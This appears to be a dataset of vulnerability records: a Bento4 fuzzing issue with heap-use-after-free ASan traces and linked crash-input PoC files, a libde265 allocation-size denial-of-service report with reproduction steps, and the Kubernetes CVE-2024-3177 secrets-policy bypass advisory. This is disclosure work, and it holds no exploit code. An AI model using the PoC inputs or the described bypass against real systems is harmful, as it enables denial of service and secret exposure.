/home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:422:41 SUMMARY: AddressSanitizer: heap-use-after-free /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Sample.h:99:48 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8510: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8520: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8530: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8540: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8550: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa =>0x0c087fff8560: fa fa fd[fd]fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8570: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8580: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8590: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff85a0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff85b0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3972313==ABORTING ``` ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp42ts input /dev/null ``` ### Version ``` Ubuntu 20.04 LTS Bento v1.6.0-641 master date:2024.3.24 ``` ### **Crash input:** [poc.zip](https://github.com/axiomatic-systems/Bento4/files/14735426/poc.zip) [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/14735422/poc1.zip) [poc2.zip](https://github.com/axiomatic-systems/Bento4/files/14735457/poc2.zip)
heap-use-after-free with ASAN in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/937/comments
0
2024-03-24T11:59:55Z
2024-03-24T12:44:25Z
https://github.com/axiomatic-systems/Bento4/issues/937
2,204,316,177
937
[ -0.014197764918208122, -0.010408708825707436, -0.02363009750843048, 0.0062210396863520145, 0.02655026875436306, -0.005611923988908529, -0.053960464894771576, 0.03633194789290428, -0.008218579925596714, 0.039270032197237015, 0.005723894108086824, 0.003699480788782239, 0.024257127195596695, ...
1,130
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : heap-use-after-free with ASAN in mp42ts Issue date: --- start body --- Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output **BUG1** ``` ================================================================= ==2611989==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000000010 at pc 0x0000004d43d9 bp 0x7fff45dd24e0 sp 0x7fff45dd24d8 READ of size 8 at 0x604000000010 thread T0 #0 0x4d43d8 in AP4_SubStream::~AP4_SubStream() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:428:17 #1 0x4d43d8 in AP4_SubStream::~AP4_SubStream() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:427:1 #2 0x5840b0 in AP4_DataAtom::~AP4_DataAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/MetaData/Ap4MetaData.cpp:1454:5 #3 0x5840b0 in AP4_DataAtom::~AP4_DataAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/MetaData/Ap4MetaData.cpp:1453:1 #4 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #5 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #6 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #7 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #8 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #9 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #10 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #11 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #12 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #13 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #14 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #15 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #16 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #17 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #18 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #19 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #20 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #21 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #22 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:88:1 #23 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:85:1 #24 0x4c84d5 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:519:9 #25 0x7f20b83c5082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #26 0x41c8fd in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x41c8fd) 0x604000000010 is located 0 bytes inside of 48-byte region [0x604000000010,0x604000000040) freed by thread T0 here: #0 0x4c500d in operator delete(void*) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c500d) #1 0x4c842a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:518:9 #2 0x7f20b83c5082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x4c47ad in operator new(unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c47ad) #1 0x589178 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14 SUMMARY: AddressSanitizer: heap-use-after-free /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:428:17 in AP4_SubStream::~AP4_SubStream() Shadow bytes around the buggy address: 0x0c087fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c087fff8000: fa fa[fd]fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8010: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8020: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8030: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8040: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2611989==ABORTING ``` **BUG2** ``` ================================================================= ==3677656==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000000010 at pc 0x000000598dee bp 0x7ffd22a2a640 sp 0x7ffd22a2a638 READ of size 8 at 0x604000000010 thread T0 #0 0x598ded in AP4_UnknownAtom::~AP4_UnknownAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:408:25 #1 0x598ded in AP4_UnknownAtom::~AP4_UnknownAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:405:1 #2 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #3 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #4 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:88:1 #5 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:85:1 #6 0x4c84d5 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:519:9 #7 0x7f3aff20b082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41c8fd in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x41c8fd) 0x604000000010 is located 0 bytes inside of 48-byte region [0x604000000010,0x604000000040) freed by thread T0 here: #0 0x4c500d in operator delete(void*) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c500d) #1 0x4c842a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:518:9 #2 0x7f3aff20b082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x4c47ad in operator new(unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c47ad) #1 0x589178 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14 SUMMARY: AddressSanitizer: heap-use-after-free /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:408:25 in AP4_UnknownAtom::~AP4_UnknownAtom() Shadow bytes around the buggy address: 0x0c087fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c087fff8000: fa fa[fd]fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3677656==ABORTING ``` **BUG3** ``` ================================================================= ==3972313==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000002b18 at pc 0x0000004f35b1 bp 0x7fff7428d660 sp 0x7fff7428d658 READ of size 8 at 0x604000002b18 thread T0 #0 0x4f35b0 in AP4_Sample::GetOffset() const /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Sample.h:99:48 #1 0x4f35b0 in AP4_LinearReader::Advance(bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:434:54 #2 0x4f42a2 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:530:29 #3 0x4cb0b0 in ReadSample(SampleReader&, AP4_Track&, AP4_Sample&, AP4_DataBuffer&, double&, bool&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181:32 #4 0x4cb0b0 in WriteSamples(AP4_Mpeg2TsWriter&, AP4_Track*, SampleReader*, AP4_Mpeg2TsWriter::SampleStream*, AP4_Track*, SampleReader*, AP4_Mpeg2TsWriter::SampleStream*, unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306:22 #5 0x4cb0b0 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:640:14 #6 0x7fa64720d082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c8fd in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x41c8fd) 0x604000002b18 is located 8 bytes inside of 48-byte region [0x604000002b10,0x604000002b40) freed by thread T0 here: #0 0x4c500d in operator delete(void*) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c500d) #1 0x4f2dff in AP4_LinearReader::SampleBuffer::~SampleBuffer() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.h:104:26 #2 0x4f2dff in AP4_LinearReader::Advance(bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:462:17 previously allocated by thread T0 here: #0 0x4c47ad in operator new(unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c47ad) #1 0x4f2360 in AP4_LinearReader::Advance(bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:422:41 SUMMARY: AddressSanitizer: heap-use-after-free /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Sample.h:99:48 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8510: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8520: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8530: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8540: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8550: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa =>0x0c087fff8560: fa fa fd[fd]fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8570: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8580: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8590: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff85a0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff85b0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3972313==ABORTING ``` ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp42ts input /dev/null ``` ### Version ``` Ubuntu 20.04 LTS Bento v1.6.0-641 master date:2024.3.24 ``` ### **Crash input:** [poc.zip](https://github.com/axiomatic-systems/Bento4/files/14735426/poc.zip) [poc1.zip](https://github.com/axiomatic-systems/Bento4/files/14735422/poc1.zip) [poc2.zip](https://github.com/axiomatic-systems/Bento4/files/14735457/poc2.zip) --- end body --- comments : --- start comments --- --- end comments ---
14,693
CVE-2023-51792
2024-04-19T17:15:52.240
Buffer Overflow vulnerability in libde265 v1.0.12 allows a local attacker to cause a denial of service via the allocation size exceeding the maximum supported size of 0x10000000000.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/strukturag/libde265" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/strukturag/libde265/issues/427" } ]
null
null
[ "strukturag", "libde265" ]
Issue
## Libde265 v1.0.12 was discovered that requested allocation size exceeds maximum supported size of 0x10000000000 ### Description Libde265 v1.0.12 was discovered that requested allocation size 0xffffffffffff5b00 (0xffffffffffff6b00 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0). This vulnerability allows attackers to cause a Denial of Service (DoS) and cause the system storage space to be used up. It is important to note that we recommend reproducing this vulnerability **in a docker environment**, as it is likely to affect your operating system and storage space! The following two images show that my docker storage space was full at the time of fuzzing this vulnerability. ![image-20231104013659975](https://github.com/strukturag/libde265/assets/67280615/d451c191-7c39-4118-abd1-08286c4f2f58) ![image-20231104013554244](https://github.com/strukturag/libde265/assets/67280615/03ed2a2b-94d9-442c-b2e4-0d7050d9d2f4) ### Version ```shell libde265/dec265 v1.0.12 ``` ### ASAN Log ./dec265/dec265 --noaccel --disable-deblocking --disable-sao -L poc2libde265 ```shell ================================================================= ==69==ERROR: AddressSanitizer: requested allocation size 0xffffffffffff5b00 (0xffffffffffff6b00 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x4c662d in operator new[](unsigned long) (/afltest/libde265/dec265/dec265+0x4c662d) #1 0x4c90d6 in convert_to_8bit(unsigned char const*, int, int, int, int) /afltest/libde265/dec265/dec265.cc:243:18 #2 0x4c90d6 in display_sdl(de265_image const*) /afltest/libde265/dec265/dec265.cc:298:12 #3 0x4cba68 in output_image(de265_image const*) /afltest/libde265/dec265/dec265.cc:353:12 #4 0x4cd633 in main /afltest/libde265/dec265/dec265.cc:802:20 #5 0x7ffff790d082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 ==69==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: allocation-size-too-big (/afltest/libde265/dec265/dec265+0x4c662d) in operator new[](unsigned long) ==69==ABORTING ``` ### Reproduction ```shell ./autogen.sh export CFLAGS="-g -lpthread -fsanitize=address" export CXXFLAGS="-g -lpthread -fsanitize=address" CC=clang CXX=clang++ ./configure --disable-shared make -j 32 ./dec265/dec265 --noaccel --disable-deblocking --disable-sao -L poc2libde265 ``` ### PoC poc2libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc2libde265 ### Reference https://github.com/strukturag/libde265 ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
Libde265 v1.0.12 was discovered that requested allocation size exceeds maximum supported size of 0x10000000000
https://api.github.com/repos/strukturag/libde265/issues/427/comments
2
2023-11-03T17:49:11Z
2023-11-07T07:22:15Z
https://github.com/strukturag/libde265/issues/427
1,976,668,054
427
[ -0.02941569872200489, 0.02186926268041134, -0.0013167760334908962, 0.00908652413636446, 0.05867738649249077, -0.011912588030099869, -0.017187392339110374, 0.0527634471654892, -0.00319953472353518, 0.027721600607037544, -0.008624497801065445, 0.014723249711096287, -0.006718637887388468, 0.0...
1,131
This is a GitHub Issue repo:libde265 owner:strukturag Title : Libde265 v1.0.12 was discovered that requested allocation size exceeds maximum supported size of 0x10000000000 Issue date: --- start body --- ## Libde265 v1.0.12 was discovered that requested allocation size exceeds maximum supported size of 0x10000000000 ### Description Libde265 v1.0.12 was discovered that requested allocation size 0xffffffffffff5b00 (0xffffffffffff6b00 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0). This vulnerability allows attackers to cause a Denial of Service (DoS) and cause the system storage space to be used up. It is important to note that we recommend reproducing this vulnerability **in a docker environment**, as it is likely to affect your operating system and storage space! The following two images show that my docker storage space was full at the time of fuzzing this vulnerability. ![image-20231104013659975](https://github.com/strukturag/libde265/assets/67280615/d451c191-7c39-4118-abd1-08286c4f2f58) ![image-20231104013554244](https://github.com/strukturag/libde265/assets/67280615/03ed2a2b-94d9-442c-b2e4-0d7050d9d2f4) ### Version ```shell libde265/dec265 v1.0.12 ``` ### ASAN Log ./dec265/dec265 --noaccel --disable-deblocking --disable-sao -L poc2libde265 ```shell ================================================================= ==69==ERROR: AddressSanitizer: requested allocation size 0xffffffffffff5b00 (0xffffffffffff6b00 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x4c662d in operator new[](unsigned long) (/afltest/libde265/dec265/dec265+0x4c662d) #1 0x4c90d6 in convert_to_8bit(unsigned char const*, int, int, int, int) /afltest/libde265/dec265/dec265.cc:243:18 #2 0x4c90d6 in display_sdl(de265_image const*) /afltest/libde265/dec265/dec265.cc:298:12 #3 0x4cba68 in output_image(de265_image const*) /afltest/libde265/dec265/dec265.cc:353:12 #4 0x4cd633 in main /afltest/libde265/dec265/dec265.cc:802:20 #5 0x7ffff790d082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 ==69==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: allocation-size-too-big (/afltest/libde265/dec265/dec265+0x4c662d) in operator new[](unsigned long) ==69==ABORTING ``` ### Reproduction ```shell ./autogen.sh export CFLAGS="-g -lpthread -fsanitize=address" export CXXFLAGS="-g -lpthread -fsanitize=address" CC=clang CXX=clang++ ./configure --disable-shared make -j 32 ./dec265/dec265 --noaccel --disable-deblocking --disable-sao -L poc2libde265 ``` ### PoC poc2libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc2libde265 ### Reference https://github.com/strukturag/libde265 ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan --- end body --- comments : --- start comments --- --- end comments ---
3,172
CVE-2024-3177
2024-04-22T23:15:51.180
A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2024/04/16/4" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://github.com/kubernetes/kubernetes/issues/124336" }, { "source": "jordan@liggitt.net", "tags": nul...
null
null
[ "kubernetes", "kubernetes" ]
Issue
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N) - **Low** (2.7) A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated. ### Am I vulnerable? The ServiceAccount admission plugin is used. Most cluster should have this on by default as recommended in https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#serviceaccount The kubernetes.io/enforce-mountable-secrets annotation is used by a service account. This annotation is not added by default. Pods using containers, init containers, and ephemeral containers with the envFrom field populated. #### Affected Versions kube-apiserver v1.29.0 - v1.29.3 kube-apiserver v1.28.0 - v1.28.8 kube-apiserver <= v1.27.12 ### How do I mitigate this vulnerability? This issue can be mitigated by applying the patch provided for the kube-apiserver component. The patch prevents containers, init containers, and ephemeral containers with the envFrom field populated from bypassing the mountable secrets policy enforced by the ServiceAccount admission plugin. Outside of applying the provided patch, there are no known mitigations to this vulnerability. #### Fixed Versions - kube-apiserver master - fixed by #124322 - kube-apiserver v1.29.4 - fixed by #124325 - kube-apiserver v1.28.9 - fixed by #124326 - kube-apiserver v1.27.13 - fixed by #124327 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/ ### Detection Pod update requests using a container, init container, or ephemeral container with the envFrom field populated that exploits this vulnerability with unintended secret will be captured in API audit logs. You can also use the following kubectl command to find active pods using the `kubernetes.io/enforce-mountable-secrets` annotation. `kubectl get serviceaccounts --all-namespaces -o jsonpath="{range .items[?(@.metadata.annotations['kubernetes\.io/enforce-mountable-secrets']=='true')]}{.metadata.namespace}{'\t'}{.metadata.name}{'\n'}{end}"` If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by tha3e1vl. The issue was fixed and coordinated by the fix team: Rita Zhang @ritazh Joel Smith @joelsmith Mo Khan @enj and release managers: Sascha Grunert @saschagrunert Jeremy Rickard @jeremyrickard /triage accepted /lifecycle frozen /area security /kind bug /committee security-response
CVE-2024-3177: Bypassing mountable secrets policy imposed by the ServiceAccount admission plugin
